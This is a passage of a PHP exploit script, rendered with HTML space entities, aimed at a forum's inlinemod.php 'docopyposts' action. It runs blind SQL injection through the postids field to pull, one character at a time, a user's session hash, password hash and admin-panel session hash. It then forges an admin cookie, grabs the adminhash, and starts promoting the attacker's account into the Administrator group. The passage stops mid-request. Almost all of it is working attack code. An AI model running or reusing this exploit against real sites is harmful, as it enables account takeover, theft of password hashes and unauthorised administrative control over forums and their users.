&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$my_uid.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\" Exploit&nbsp;failed...\"); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;} $j++; } $my_uid=intval($my_uid); $chars[0]=0;//null $chars=array_merge($chars,range(48,57));&nbsp;//numbers $chars=array_merge($chars,range(97,102));//a-f&nbsp;letters $j=1;$sess_hash=\"\"; echo&nbsp;\" session&nbsp;hash&nbsp;->&nbsp;\"; while&nbsp;(!strstr($sess_hash,chr(0))) { &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\" unknown&nbsp;query&nbsp;error...\");} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\" \",$temp[1]); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0]; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$sess_hash.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\" Exploit&nbsp;failed...\"); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;} $j++; } $j=1;$my_hash=\"\"; echo&nbsp;\" user&nbsp;password&nbsp;hash&nbsp;->&nbsp;\"; while&nbsp;(!strstr($my_hash,chr(0))) { &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\" unknown&nbsp;query&nbsp;error...\");} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\" \",$temp[1]); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0]; &nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$my_hash.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\" Exploit&nbsp;failed...\"); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;} $j++; } $j=1;$cpsess_hash=\"\"; echo&nbsp;\" cp&nbsp;session&nbsp;hash&nbsp;->&nbsp;\"; while&nbsp;(!strstr($cpsess_hash,chr(0))) { &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\" \",$temp[1]); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0]; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\" unknown&nbsp;query&nbsp;error...\");} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$cpsess_hash.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\" Exploit&nbsp;failed...\"); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;} $j++; } echo&nbsp;\" \"; $packet&nbsp;=\"GET&nbsp;\".$p.\"admincp/user.php?do=edit&u=$my_uid&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language:&nbsp;en \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Pragma:&nbsp;no-cache \"; $packet.=\"Cookie:&nbsp;\".$cookie_prefix.\"lastactivity=0;&nbsp;\".$cookie_prefix.\"password=\".md5(trim($my_hash)).\";&nbsp;bbuserid=\".$uid.\";&nbsp;\".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\";&nbsp;\".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\"; \"; $packet.=\"Connection:&nbsp;Close \"; sendpacketii($packet); $temp=explode(\"adminhash\"&nbsp;value=\"\",$html); $temp2=explode(\"\"\",$temp[1]); $adminhash=$temp2[0]; echo&nbsp;\"adminhash&nbsp;->\".$adminhash.\" \"; if&nbsp;($adminhash<>\"\")&nbsp;{echo&nbsp;\" done!&nbsp;you&nbsp;are&nbsp;in...&nbsp;updating&nbsp;\".$user.\"&nbsp;rights\";} else&nbsp;{die(\" exploit&nbsp;failed...\");} //join&nbsp;to&nbsp;the&nbsp;Administrator&nbsp;group $my_email=\"suntzu@suntzu.com\"; $data&nbsp;=\"do=update\"; $data.=\"&adminhash=$adminhash\"; $data.=\"&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D\".$my_uid; $data.=\"&user%5Busername%5D=$user\"; $data.=\"&password=\"; $data.=\"&user%5Bemail%5D=$my_email\"; $data.=\"&user%5Blanguageid%5D=0\"; $data.=\"&user%5Busertitle%5D=Admin\"; $data.=\"&user%5Bcustomtitle%5D=0\"; $data.=\"&user%5Bhomepage%5D=\"; $data.=\"&user%5Bbirthday%5D%5Bmonth%5D=0\"; $data.=\"&user%5Bbirthday%5D%5Bday%5D=\"; $data.=\"&user%5Bbirthday%5D%5Byear%5D=\"; $data.=\"&user%5Bshowbirthday%5D=0\"; $data.=\"&user%5Bsignature%5D=\"; $data.=\"&user%5Bicq%5D=\"; $data.=\"&user%5Baim%5D=\"; $data.=\"&user%5Byahoo%5D=\"; $data.=\"&user%5Bmsn%5D=\"; $data.=\"&user%5Bskype%5D=\"; $data.=\"&options%5Bcoppauser%5D=0\"; $data.=\"&user%5Bparentemail%5D=$my_email\"; $data.=\"&user%5Breferrerid%5D=\"; $data.=\"&user%5Bipaddress%5D=\"; 